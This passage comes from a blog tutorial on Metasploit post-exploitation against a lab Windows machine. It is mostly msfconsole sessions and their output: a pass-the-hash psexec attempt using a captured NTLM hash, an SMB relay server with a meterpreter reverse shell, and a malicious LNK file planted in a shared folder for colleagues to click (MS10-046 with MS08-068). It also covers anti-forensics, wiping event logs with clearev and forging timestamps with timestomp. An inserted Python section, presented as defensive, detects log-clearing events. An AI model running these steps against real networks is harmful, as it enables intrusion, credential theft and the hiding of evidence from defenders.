msf  exploit(psexec) > set LHOST 192.168.0.108
LHOST => 192.168.0.108
msf  exploit(psexec) > set LPORT 443
LPORT => 443
msf  exploit(psexec) > set RHOST 192.168.0.111
RHOST => 192.168.0.111
msf  exploit(psexec) > set SMBPass daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011
SMBPass => daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011
msf  exploit(psexec) > exploit

[*] Started reverse handler on 192.168.0.108:443 
[*] Connecting to the server...
[*] Authenticating to 192.168.0.111:445|WORKGROUP as user ''...
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
msf  exploit(psexec) > 

Well, that one failed, but if someone has logged on to this machine and used its SMB service, and the SMBPass we set (a hash found somewhere else) matches, it works.. It depends on luck, but passing the hash (instead of cracking it) is a good technique..

4) MS10-046 + MS08-068 + running your own SMB server, then waiting for the fish to bite


Setting up the SMB server:
msf  post(droplnk) > use exploit/windows/smb/smb_relay 
msf  exploit(smb_relay) > show options

Module options (exploit/windows/smb/smb_relay):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SMBHOST                      no        The target SMB server (leave empty for originating system)
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     445              yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(smb_relay) > set SRVHOST 192.168.0.108
SRVHOST => 192.168.0.108
msf  exploit(smb_relay) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(smb_relay) > set LHOST 192.168.0.108
LHOST => 192.168.0.108
msf  exploit(smb_relay) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.108:4444 
[*] Server started.
msf  exploit(smb_relay) > 


MS10-046: LNK shortcut file vulnerability, apparently usable for privilege escalation
It lives in shell32.dll, which Windows programs use to load a shortcut's icon. When the icon lives in a user-supplied DLL, a malicious LNK file can be crafted to point at that DLL..
The system does not validate the parameters properly when parsing the shortcut, so the user's DLL gets loaded and executed..

msf  exploit(psexec) > use post/windows/escalate/droplnk 
msf  post(droplnk) > show options

Module options (post/windows/escalate/droplnk):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   ICONFILENAME  icon.png         yes       File name on LHOST's share
   LHOST                          yes       Host listening for incoming SMB/WebDAV traffic
   LNKFILENAME   Words.lnk        yes       Shortcut's filename
   SESSION                        yes       The session to run this module on.
   SHARENAME     share1           yes       Share name on LHOST

msf  post(droplnk) > set LHOST 192.168.0.108
LHOST => 192.168.0.108
msf  post(droplnk) > set session 1
session => 1
msf  post(droplnk) > exploit

[*] Creating evil LNK
[*] Done. Writing to disk - C:\WINDOWS\system32\Words.lnk
[*] Done. Wait for evil to happen..
[*] Post module execution completed
msf  post(droplnk) > 

The process:
We copy this C:\Windows\system32\Words.lnk file into a shared folder on the internal network.. and wait for someone to click it..
If some colleague A clicks the lnk file, MS10-046 is triggered.. A then connects to the malicious SMB server we set up, which in turn triggers MS08-068..
The two vulnerabilities together mean one look is enough to get owned..


Extended reading:
In the early NT LAN Manager days the SMB protocol sent passwords over the network in clear text. Later came the LAN Manager challenge/response authentication mechanism, LM for short, which was so simple that it was easily broken. Microsoft then introduced the Windows NT challenge/response mechanism, called NTLM.
MS08-068 is a vulnerability in SMB's handling of NTLM. When the target connects to the attacker's malicious SMB server, the attacker delays the SMB response, takes the target's NTLM hash (its challenge response) and replays it back to the target, and so passes authentication..


9. Destroying evidence

1) clearev

meterpreter > clearev
[*] Wiping 148 records from Application...
[*] Wiping 335 records from System...
[*] Wiping 0 records from Security...
meterpreter > 
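From the defender's side, clearev is not silent. Clearing the Security log is itself audited: Windows XP/2003 write event 517 and Vista and later write event 1102 ("The audit log was cleared") immediately after the clear, and Vista and later also write event 104 to the System log when any log is cleared. The old records are gone, but the clearing event is not, so it is the thing to hunt for. As an added example (not code from the article or from Metasploit), here is a detector over an exported event list; the records are constructed for this example, in a simple pipe-separated layout assumed here (timestamp|log|event id|source|message).

```python
"""Spot evidence that a Windows event log was cleared.

Added example, not from the article. Clearing a log writes a clearing
event right after the wipe (Security 517 on XP/2003, Security 1102 and
System 104 on Vista and later), so that event survives any clearev.
"""

CLEAR_EVENTS = {
    ("Security", 517): "audit log cleared (XP/2003)",
    ("Security", 1102): "audit log cleared (Vista and later)",
    ("System", 104): "event log cleared (Vista and later)",
}

# Constructed sample export from the XP box, oldest record first.
# Everything before 16:50:12 has been wiped; the 517 is the first survivor.
SAMPLE_EXPORT = """\
2013-12-07 16:50:12|Security|517|Security|The audit log was cleared.
2013-12-07 16:50:13|System|7036|Service Control Manager|The Themes service entered the running state.
2013-12-07 16:51:03|Security|528|Security|Successful Logon: User Name: Administrator Logon Type: 2
2013-12-07 16:52:40|Application|1000|Application Error|Faulting application iexplore.exe
"""


def parse_export(text):
    """Return records as dicts with time, log, event_id (int), source, message."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        time, log, event_id, source, message = line.split("|", 4)
        records.append({"time": time, "log": log, "event_id": int(event_id),
                        "source": source, "message": message})
    return records


def find_log_clearing(records):
    """One finding per clearing event.

    wiped_history is True when the clearing event is the oldest record left
    in its log, i.e. nothing from before the clear survived on the host.
    Timestamps are ISO-like strings, so plain string comparison orders them.
    """
    earliest = {}
    for rec in records:
        log = rec["log"]
        if log not in earliest or rec["time"] < earliest[log]:
            earliest[log] = rec["time"]
    findings = []
    for rec in records:
        label = CLEAR_EVENTS.get((rec["log"], rec["event_id"]))
        if label is None:
            continue
        findings.append({
            "time": rec["time"], "log": rec["log"], "event_id": rec["event_id"],
            "label": label,
            "wiped_history": rec["time"] <= earliest[rec["log"]],
        })
    return findings


if __name__ == "__main__":
    for hit in find_log_clearing(parse_export(SAMPLE_EXPORT)):
        gap = " (all older records gone)" if hit["wiped_history"] else ""
        print(f"{hit['time']} {hit['log']} {hit['event_id']}: {hit['label']}{gap}")
```

Two points follow from the article's own output. "Wiping 0 records from Security" is what an XP box with the default audit policy looks like: nothing was ever logged there, so there was nothing to wipe; turning auditing on is the prerequisite for this detector to have anything to find. And because clearev deletes the records locally, the copy that matters is the one forwarded to a remote collector before the clear, which is where the 148 Application and 335 System records would still be.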


2) timestomp

meterpreter > ls

Listing: c:\
============

Mode              Size       Type  Last modified              Name
----              ----       ----  -------------              ----
100666/rw-rw-rw-  0          fil   2013-12-07 16:44:55 +0800  1.txt.txt
100666/rw-rw-rw-  68         fil   2013-12-07 12:28:07 +0800  nimeia.txt

meterpreter > timestomp 1.txt.txt -f nimeia.txt
[*] Setting MACE attributes on 1.txt.txt from nimeia.txt
meterpreter > ls

Listing: c:\
============

Mode              Size       Type  Last modified              Name
----              ----       ----  -------------              ----
100666/rw-rw-rw-  0          fil   2013-12-07 12:28:07 +0800  1.txt.txt
100666/rw-rw-rw-  68         fil   2013-12-07 12:28:07 +0800  nimeia.txt

meterpreter > 

This way the file's timestamps are changed, so it is less likely to be noticed..





References: 《Metasploit滲透測試魔鬼訓練營》 (Metasploit Penetration Testing Devil Training Camp) by 諸葛建偉
emaster, doing network security while losing weight. Reposting is welcome, but please include the address of this article: http://blog.csdn.net/emaste_r/article/details/17119093



